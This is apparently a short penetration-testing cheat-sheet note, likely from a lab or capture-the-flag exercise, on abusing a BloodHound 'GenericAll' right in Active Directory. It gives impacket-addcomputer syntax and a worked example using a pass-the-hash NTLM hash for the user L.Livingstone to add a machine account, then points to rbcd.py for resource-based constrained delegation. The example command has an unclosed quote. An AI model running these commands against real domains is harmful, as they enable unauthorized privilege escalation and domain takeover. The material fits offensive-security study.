[[BloodHound]] > `GenericAll` ```bash # syntax impacket-addcomputer <domain>/<user> -dc-ip $IP -hashes <hash> -computer-name <name> -computer-pass <pwd> # example impacket-addcomputer resourced.local/L.Livingstone -dc-ip $IP -hashes :19a3a7550ce8c505c2d46b5e39d6f808 -computer-name 'Wook -computer-pass 'wook413' # confirm Get-ADComputer <computer name> ``` After adding the computer, we need to manage delegation rights with [[rbcd.py]]